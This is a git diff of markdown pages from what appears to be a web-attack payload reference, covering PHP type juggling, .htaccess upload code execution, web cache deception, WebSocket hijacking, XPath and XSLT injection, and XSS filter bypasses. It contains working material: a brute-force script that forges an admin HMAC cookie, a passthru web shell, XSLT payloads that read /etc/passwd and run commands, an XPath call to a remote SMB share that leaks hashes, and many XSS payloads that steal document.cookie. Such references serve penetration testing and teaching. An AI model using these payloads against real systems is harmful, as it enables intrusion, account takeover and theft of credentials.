@ -80,7 +76,7 @@ Loose Type comparisons occurs in many languages:
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
| SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083)
| SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) |
```php
<?php
@ -97,61 +93,65 @@ The vulnerability in the following code lies in the use of a loose comparison (!
```php
function validate_cookie($cookie,$key){
$hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['expiration'], $key);
if($cookie['hmac'] != $hash){ // loose comparison
return false;
}
else{
echo "Well done";
}
$hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['expiration'], $key);
if($cookie['hmac'] != $hash){ // loose comparison
return false;
}
else{
echo "Well done";
}
}
```
In this case, if an attacker can control the $cookie['hmac'] value and set it to a string like "0", and somehow manipulate the hash_hmac function to return a hash that starts with "0e" followed only by numbers (which is interpreted as zero), the condition $cookie['hmac'] != $hash would evaluate to false, effectively bypassing the HMAC check.
We have control over 3 elements in the cookie:
- `$username` - username you are targeting, probably "admin"
- `$expiration` - a UNIX timestamp, must be in the future
- `$hmac` - the provided hash, "0"
* `$username` - username you are targeting, probably "admin"
* `$expiration` - a UNIX timestamp, must be in the future
* `$hmac` - the provided hash, "0"
The exploitation phase is the following:
1. Prepare a malicious cookie: The attacker prepares a cookie with $username set to the user they wish to impersonate (for example, "admin"), `$expiration` set to a future UNIX timestamp, and $hmac set to "0".
2. Brute force the `$expiration` value: The attacker then brute forces different `$expiration` values until the hash_hmac function generates a hash that starts with "0e" and is followed only by numbers. This is a computationally intensive process and might not be feasible depending on the system setup. However, if successful, this step would generate a "zero-like" hash.
```php
// docker run -it --rm -v /tmp/test:/usr/src/myapp -w /usr/src/myapp php:8.3.0alpha1-cli-buster php exp.php
for($i=1424869663; $i < 1835970773; $i++ ){
$out = hash_hmac('md5', 'admin|'.$i, '');
if(str_starts_with($out, '0e' )){
if($out == 0){
echo "$i - ".$out;
break;
}
}
}
?>
```
3. Update the cookie data with the value from the bruteforce: `1539805986 - 0e772967136366835494939987377058`
```php
$cookie = [
'username' => 'admin',
'expiration' => 1539805986,
'hmac' => '0'
];
```
4. In this case we assumed the key was a null string : `$key = '';`
* Prepare a malicious cookie: The attacker prepares a cookie with $username set to the user they wish to impersonate (for example, "admin"), `$expiration` set to a future UNIX timestamp, and $hmac set to "0".
* Brute force the `$expiration` value: The attacker then brute forces different `$expiration` values until the hash_hmac function generates a hash that starts with "0e" and is followed only by numbers. This is a computationally intensive process and might not be feasible depending on the system setup. However, if successful, this step would generate a "zero-like" hash.
```php
// docker run -it --rm -v /tmp/test:/usr/src/myapp -w /usr/src/myapp php:8.3.0alpha1-cli-buster php exp.php
for($i=1424869663; $i < 1835970773; $i++ ){
$out = hash_hmac('md5', 'admin|'.$i, '');
if(str_starts_with($out, '0e' )){
if($out == 0){
echo "$i - ".$out;
break;
}
}
}
?>
```
* Update the cookie data with the value from the bruteforce: `1539805986 - 0e772967136366835494939987377058`
```php
$cookie = [
'username' => 'admin',
'expiration' => 1539805986,
'hmac' => '0'
];
```
* In this case we assumed the key was a null string : `$key = '';`
## Labs
* [Root Me - PHP - Type Juggling](https://www.root-me.org/en/Challenges/Web-Server/PHP-type-juggling)
* [Root Me - PHP - Loose Comparison](https://www.root-me.org/en/Challenges/Web-Server/PHP-Loose-Comparison)
## References
- [(Super) Magic Hashes - myst404 (@myst404_) - October 7, 2019](https://offsec.almond.consulting/super-magic-hash.html)
- [Magic Hashes - Robert Hansen - May 11, 2015](http://web.archive.org/web/20160722013412/https://www.whitehatsec.com/blog/magic-hashes/)
- [Magic hashes PHP hash "collisions" - Michal Špaček (@spaze) - May 6, 2015](https://github.com/spaze/hashes)
- [PHP Magic Tricks: Type Juggling - Chris Smith (@chrismsnz) - August 18, 2020](http://web.archive.org/web/20200818131633/https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
- [Writing Exploits For Exotic Bug Classes: PHP Type Juggling - Tyler Borland (TurboBorland) - August 17, 2013](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
* [(Super) Magic Hashes - myst404 (@myst404_) - October 7, 2019](https://offsec.almond.consulting/super-magic-hash.html)
* [Magic Hashes - Robert Hansen - May 11, 2015](http://web.archive.org/web/20160722013412/https://www.whitehatsec.com/blog/magic-hashes/)
* [Magic hashes PHP hash "collisions" - Michal Špaček (@spaze) - May 6, 2015](https://github.com/spaze/hashes)
* [PHP Magic Tricks: Type Juggling - Chris Smith (@chrismsnz) - August 18, 2020](http://web.archive.org/web/20200818131633/https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling - Tyler Borland (TurboBorland) - August 17, 2013](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)

13
Upload Insecure Files/Configuration Apache .htaccess/README.md
View file

@ -10,13 +10,11 @@ Uploading an .htaccess file to override Apache rule and execute PHP.
* [Polyglot .htaccess](#polyglot-htaccess)
* [References](#references)
## AddType Directive
Upload an .htaccess with : `AddType application/x-httpd-php .rce`
Upload an .htaccess with : `AddType application/x-httpd-php .rce`
Then upload any file with `.rce` extension.
## Self Contained .htaccess
```python
@ -39,15 +37,14 @@ AddType application/x-httpd-php .htaccess
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
```
## Polyglot .htaccess
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot.
* Create valid `.htaccess/xbm` image
```python
width = 50
height = 50
@ -60,6 +57,7 @@ If the `exif_imagetype` function is used on the server side to determine the ima
```
* Create valid `.htaccess/wbmp` image
```python
type_header = b'\x00'
fixed_header = b'\x00'
@ -73,9 +71,8 @@ If the `exif_imagetype` function is used on the server side to determine the ima
htaccess.write(payload)
```
## References
* [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
* [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015 ](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
* [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
* [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)

58
Web Cache Deception/README.md
View file

@ -2,7 +2,6 @@
> Web Cache Deception (WCD) is a security vulnerability that occurs when a web server or caching proxy misinterprets a client's request for a web resource and subsequently serves a different resource, which may often be more sensitive or private, after caching it.
## Summary
* [Tools](#tools)
@ -13,30 +12,27 @@
* [Labs](#labs)
* [References](#references)
## Tools
* [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Web Cache Poisoning Burp Extension
## Methodology
Example of Web Cache Deception:
Example of Web Cache Deception:
Imagine an attacker lures a logged-in victim into accessing `http://www.example.com/home.php/non-existent.css`
1. The victim's browser requests the resource `http://www.example.com/home.php/non-existent.css`
2. The requested resource is searched for in the cache server, but it's not found (resource not in cache).
3. The request is then forwarded to the main server.
4. The main server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct not to cache this page.
5. The response passes through the cache server.
6. The cache server identifies that the file has a CSS extension.
7. Under the cache directory, the cache server creates a directory named home.php and caches the imposter "CSS" file (non-existent.css) inside it.
2. The requested resource is searched for in the cache server, but it's not found (resource not in cache).
3. The request is then forwarded to the main server.
4. The main server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct not to cache this page.
5. The response passes through the cache server.
6. The cache server identifies that the file has a CSS extension.
7. Under the cache directory, the cache server creates a directory named home.php and caches the imposter "CSS" file (non-existent.css) inside it.
8. When the attacker requests `http://www.example.com/home.php/non-existent.css`, the request is sent to the cache server, and the cache server returns the cached file with the victim's sensitive `home.php` data.
![WCD Demonstration](Images/wcd.jpg)
### Caching Sensitive Data
**Example 1** - Web Cache Deception on PayPal Home Page
@ -58,10 +54,10 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
4. Response is cached.
5. Attacker harvests JWT Credentials.
### Caching Custom JavaScript
1. Find an un-keyed input for a Cache Poisoning
```js
Values: User-Agent
Values: Cookie
@ -72,7 +68,9 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
Header: X-Original-URL (Symfony)
Header: X-Rewrite-URL (Symfony)
```
2. Cache poisoning attack - Example for `X-Forwarded-Host` un-keyed input (remember to use a buster to only cache this webpage instead of the main page of the website)
```js
GET /test?buster=123 HTTP/1.1
Host: target.com
@ -84,7 +82,6 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
<meta property="og:image" content="https://test"><script>alert(1)</script>">
```
## Tricks
The following URL format are a good starting point to check for "cache" feature.
@ -93,14 +90,12 @@ The following URL format are a good starting point to check for "cache" feature.
* `https://example.com/app/conversation/;.js`
* `https://example.com/home.php/non-existent.css`
## CloudFlare Caching
CloudFlare caches the resource when the `Cache-Control` header is set to `public` and `max-age` is greater than 0.
- The Cloudflare CDN does not cache HTML by default
- Cloudflare only caches based on file extension and not by MIME type: [cloudflare/default-cache-behavior](https://developers.cloudflare.com/cache/about/default-cache-behavior/)
CloudFlare caches the resource when the `Cache-Control` header is set to `public` and `max-age` is greater than 0.
* The Cloudflare CDN does not cache HTML by default
* Cloudflare only caches based on file extension and not by MIME type: [cloudflare/default-cache-behavior](https://developers.cloudflare.com/cache/about/default-cache-behavior/)
In Cloudflare CDN, one can implement a `Cache Deception Armor`, it is not enabled by default.
When the `Cache Deception Armor` is enabled, the rule will verify a URL's extension matches the returned `Content-Type`.
@ -118,29 +113,26 @@ CloudFlare has a list of default extensions that gets cached behind their Load B
| BZ2 | EPS | JPEG | PDF | SVGZ | WOFF2 | TAR |
| CLASS | EXE | JS | PICT | SWF | XLS | XLSX |
Exceptions and bypasses:
* If the returned Content-Type is application/octet-stream, the extension does not matter because that is typically a signal to instruct the browser to save the asset instead of to display it.
* Cloudflare allows .jpg to be served as image/webp or .gif as video/webm and other cases that we think are unlikely to be attacks.
* [Bypassing Cache Deception Armor using .avif extension file - fixed](https://hackerone.com/reports/1391635)
## Labs
## Labs
* [PortSwigger Labs for Web Cache Deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning)
## References
- [Cache Deception Armor - Cloudflare - May 20, 2023](https://developers.cloudflare.com/cache/cache-security/cache-deception-armor/)
- [Exploiting cache design flaws - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
- [Exploiting cache implementation flaws - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
- [How I Test For Web Cache Vulnerabilities + Tips And Tricks - bombon (0xbxmbn) - July 21, 2022](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
- [OpenAI Account Takeover - Nagli (@naglinagli) - March 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024)
- [Practical Web Cache Poisoning - James Kettle (@albinowax) - August 9, 2018](https://portswigger.net/blog/practical-web-cache-poisoning)
- [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Nagli (@naglinagli) - July 15, 2024](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
- [Web Cache Deception Attack - Omer Gil - February 27, 2017](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
- [Web Cache Deception Attack leads to user info disclosure - Kunal Pandey (@kunal94) - February 25, 2019](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
- [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle (@albinowax) - August 5, 2020](https://portswigger.net/research/web-cache-entanglement)
- [Web cache poisoning - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning)
* [Cache Deception Armor - Cloudflare - May 20, 2023](https://developers.cloudflare.com/cache/cache-security/cache-deception-armor/)
* [Exploiting cache design flaws - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
* [Exploiting cache implementation flaws - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
* [How I Test For Web Cache Vulnerabilities + Tips And Tricks - bombon (0xbxmbn) - July 21, 2022](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
* [OpenAI Account Takeover - Nagli (@naglinagli) - March 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024)
* [Practical Web Cache Poisoning - James Kettle (@albinowax) - August 9, 2018](https://portswigger.net/blog/practical-web-cache-poisoning)
* [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Nagli (@naglinagli) - July 15, 2024](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
* [Web Cache Deception Attack - Omer Gil - February 27, 2017](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
* [Web Cache Deception Attack leads to user info disclosure - Kunal Pandey (@kunal94) - February 25, 2019](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
* [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle (@albinowax) - August 5, 2020](https://portswigger.net/research/web-cache-entanglement)
* [Web cache poisoning - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning)

21
Web Sockets/README.md
View file

@ -2,24 +2,21 @@
> WebSocket is a communication protocol that provides full-duplex communication channels over a single, long-lived connection. This enables real-time, bi-directional communication between clients (typically web browsers) and servers through a persistent connection. WebSockets are commonly used for web applications that require frequent, low-latency updates, such as live chat applications, online gaming, real-time notifications, and financial trading platforms.
## Summary
* [Tools](#tools)
* [Methodology](#methodology)
* [Using wsrepl](#using-wsrepl)
* [Using ws-harness.py](#using-ws-harness-py)
* [Using ws-harness.py](#using-ws-harnesspy)
* [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh)
* [Labs](#labs)
* [References](#references)
## Tools
* [doyensec/wsrepl](https://github.com/doyensec/wsrepl) - WebSocket REPL for pentesters
* [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
## Methodology
### Using wsrepl
@ -73,7 +70,6 @@ class Demo(Plugin):
message.long = original
```
### Using ws-harness.py
Start `ws-harness` to listen on a web-socket, and specify a message template to send to the endpoint.
@ -97,7 +93,6 @@ Then you can use any tools against the newly created web service, working as a p
sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
```
## Cross-Site WebSocket Hijacking (CSWSH)
If the WebSocket handshake is not correctly protected using a CSRF token or a
@ -126,7 +121,6 @@ application uses a `Sec-WebSocket-Protocol` header in the handshake request,
you have to add this value as a 2nd parameter to the `WebSocket` function call
in order to add this header.
## Labs
* [PortSwigger - Manipulating WebSocket messages to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities)
@ -134,12 +128,11 @@ in order to add this header.
* [PortSwigger - Manipulating the WebSocket handshake to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities)
* [Root Me - Web Socket - 0 protection](https://www.root-me.org/en/Challenges/Web-Client/Web-Socket-0-protection)
## References
- [Hacking Web Sockets: All Web Pentest Tools Welcomed - Michael Fowl - March 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
- [Hacking with WebSockets - Mike Shema, Sergey Shekyan, Vaagn Toukharian - September 20, 2012](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
- [Mini WebSocket CTF - Snowscan - January 27, 2020](https://snowscan.io/bbsctf-evilconneck/#)
- [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - July 18, 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
- [Testing for WebSockets security vulnerabilities - PortSwigger - September 28, 2019](https://portswigger.net/web-security/websockets)
- [WebSocket Attacks - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/websocket-attacks)
* [Hacking Web Sockets: All Web Pentest Tools Welcomed - Michael Fowl - March 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
* [Hacking with WebSockets - Mike Shema, Sergey Shekyan, Vaagn Toukharian - September 20, 2012](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
* [Mini WebSocket CTF - Snowscan - January 27, 2020](https://snowscan.io/bbsctf-evilconneck/#)
* [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - July 18, 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
* [Testing for WebSockets security vulnerabilities - PortSwigger - September 28, 2019](https://portswigger.net/web-security/websockets)
* [WebSocket Attacks - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/websocket-attacks)

22
XPATH Injection/README.md
View file

@ -2,7 +2,6 @@
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
## Summary
* [Tools](#tools)
@ -14,16 +13,15 @@
## Tools
- [orf/xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
- [feakk/xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
- [aayla-secura/xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
- [micsoftvn/xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
- [Harshal35/XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
* [orf/xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
* [feakk/xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
* [aayla-secura/xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
* [micsoftvn/xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
* [Harshal35/XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
## Methodology
Similar to SQL injection, you want to terminate the query properly:
Similar to SQL injection, you want to terminate the query properly:
```ps1
string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())
@ -51,11 +49,13 @@ x' or name()='username' or 'x'='y
### Blind Exploitation
1. Size of a string
```sql
and string-length(account)=SIZE_INT
```
2. Access a character with `substring`, and verify its value the `codepoints-to-string` function
```sql
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
@ -67,15 +67,13 @@ x' or name()='username' or 'x'='y
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
```
## Labs
* [Root Me - XPath injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Authentication)
* [Root Me - XPath injection - String](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-String)
* [Root Me - XPath injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Blind)
## References
- [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
- [XPATH Injection - OWASP - January 21, 2015](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
* [XPATH Injection - OWASP - January 21, 2015](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))

19
XSLT Injection/README.md
View file

@ -2,7 +2,6 @@
> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
## Summary
- [Tools](#tools)
@ -17,12 +16,10 @@
- [Labs](#labs)
- [References](#references)
## Tools
No known tools currently exist to assist with XSLT exploitation.
## Methodology
### Determine the Vendor and Version
@ -31,7 +28,7 @@ No known tools currently exist to assist with XSLT exploitation.
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/fruits">
<xsl:value-of select="system-property('xsl:vendor')"/>
<xsl:value-of select="system-property('xsl:vendor')"/>
</xsl:template>
</xsl:stylesheet>
```
@ -76,7 +73,7 @@ Don't forget to test for XXE when you encounter XSLT files.
<xsl:copy-of select="document('/etc/passwd')"/>
<xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
Fruits:
<!-- Loop for each fruit -->
<!-- Loop for each fruit -->
<xsl:for-each select="fruit">
<!-- Print name: description -->
- <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
@ -85,10 +82,9 @@ Don't forget to test for XXE when you encounter XSLT files.
</xsl:stylesheet>
```
### Write Files with EXSLT Extension
EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language.
EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language.
```xml
<?xml version="1.0" encoding="UTF-8"?>
@ -105,7 +101,6 @@ EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions
</xsl:stylesheet>
```
### Remote Code Execution with PHP Wrapper
Execute the function `readfile`.
@ -238,22 +233,20 @@ return proc.StandardOutput.ReadToEnd();
<xsl:template match="/fruits">
--- BEGIN COMMAND OUTPUT ---
<xsl:value-of select="user:execute()"/>
--- END COMMAND OUTPUT ---
<xsl:value-of select="user:execute()"/>
--- END COMMAND OUTPUT ---
</xsl:template>
</xsl:stylesheet>
```
## Labs
- [Root Me - XSLT - Code execution](https://www.root-me.org/en/Challenges/Web-Server/XSLT-Code-execution)
## References
- [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
- [XSLT Injection - Fortify - January 16, 2021](http://web.archive.org/web/20210116001237/https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
- [XSLT Injection Basics - Saxon - Hunnic Cyber Team - August 21, 2019](http://web.archive.org/web/20190821174700/https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
- [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
- [XSLT injection lead to file creation - PT SWARM (@ptswarm) - May 30, 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)
- [XSLT injection lead to file creation - PT SWARM (@ptswarm) - May 30, 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)

64
XSS Injection/1 - XSS Filter Bypass.md
View file

@ -17,7 +17,7 @@
- [Bypass Email Filter](#bypass-email-filter)
- [Bypass Tel URI Filter](#bypass-tel-uri-filter)
- [Bypass document Blacklist](#bypass-document-blacklist)
- [Bypass document.cookie Blacklist](#bypass-document-cookie-blacklist)
- [Bypass document.cookie Blacklist](#bypass-documentcookie-blacklist)
- [Bypass using Javascript Inside a String](#bypass-using-javascript-inside-a-string)
- [Bypass using an Alternate Way to Redirect](#bypass-using-an-alternate-way-to-redirect)
- [Bypass using an Alternate Way to Execute an Alert](#bypass-using-an-alternate-way-to-execute-an-alert)
@ -40,7 +40,6 @@
- [Bypass using JSfuck](#bypass-using-jsfuck)
- [References](#references)
## Bypass Case Sensitive
To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names.
@ -52,7 +51,6 @@ To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercas
Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters.
## Bypass Tag Blacklist
```javascript
@ -112,7 +110,6 @@ You can bypass a single quote with &#39; in an on mousedown event handler
```
Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
http://www.geektools.com/cgi-bin/ipconv.cgi
```javascript
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
@ -129,32 +126,37 @@ setTimeout`alert\u0028document.domain\u0029`;
## Bypass Parenthesis and Semi Colon
* From @garethheyes
- From @garethheyes
```javascript
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
```
* From @terjanq
- From @terjanq
```js
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
```
* From @cgvwzq
- From @cgvwzq
```js
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```
## Bypass onxxxx Blacklist
* Use less known tag
- Use less known tag
```html
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
```
* Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
- Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
```html
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
@ -162,20 +164,22 @@ setTimeout`alert\u0028document.domain\u0029`;
<img src='1' onerror\x0a=alert(0) />
```
* Bypass onxxx= filter with a '/'
- Bypass onxxx= filter with a '/'
```js
<img src='1' onerror/=alert(0) />
```
## Bypass Space Filter
* Bypass space filter with "/"
- Bypass space filter with "/"
```javascript
<img/src='1'/onerror=alert(0)>
```
* Bypass space filter with `0x0c/^L` or `0x0d/^M` or `0x0a/^J` or `0x09/^I`
- Bypass space filter with `0x0c/^L` or `0x0d/^M` or `0x0a/^J` or `0x09/^I`
```html
<svg onload = alert(1) >
```
@ -186,32 +190,31 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000010: 6572 7428 3129 0c3e 0a ert(1).>.
```
## Bypass Email Filter
* [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
- [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
```javascript
"><svg/onload=confirm(1)>"@x.y
```
* [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)
- [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)
```javascript
xss@example.com(<img src='x' onerror='alert(document.location)'>)
```
## Bypass Tel URI Filter
At least 2 RFC mention the `;phone-context=` descriptor:
* [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt)
* [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt)
- [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt)
- [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt)
```javascript
+330011223344;phone-context=<script>alert(0)</script>
```
## Bypass Document Blacklist
```javascript
@ -391,12 +394,11 @@ Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#b
'te' instanceof alert('instanceof') instanceof 'xt';
```
## Bypass using Missing Charset Header
**Requirements**:
* Server header missing `charset`: `Content-Type: text/html`
- Server header missing `charset`: `Content-Type: text/html`
### ISO-2022-JP
@ -409,22 +411,19 @@ ISO-2022-JP uses escape characters to switch between several character sets.
| `\x1B $@` | JIS X 0208 1978 |
| `\x1B $B` | JIS X 0208 1983 |
Using the [code table](https://en.wikipedia.org/wiki/JIS_X_0201#Codepage_layout), we can find multiple characters that will be transformed when switching from **ASCII** to **JIS X 0201 1976**.
| Hex | ASCII | JIS X 0201 1976 |
| ---- | --- | --- |
| 0x5c | `\` | `¥` |
| 0x5c | `\` | `¥` |
| 0x7e | `~` | `‾` |
**Example**
**Example**:
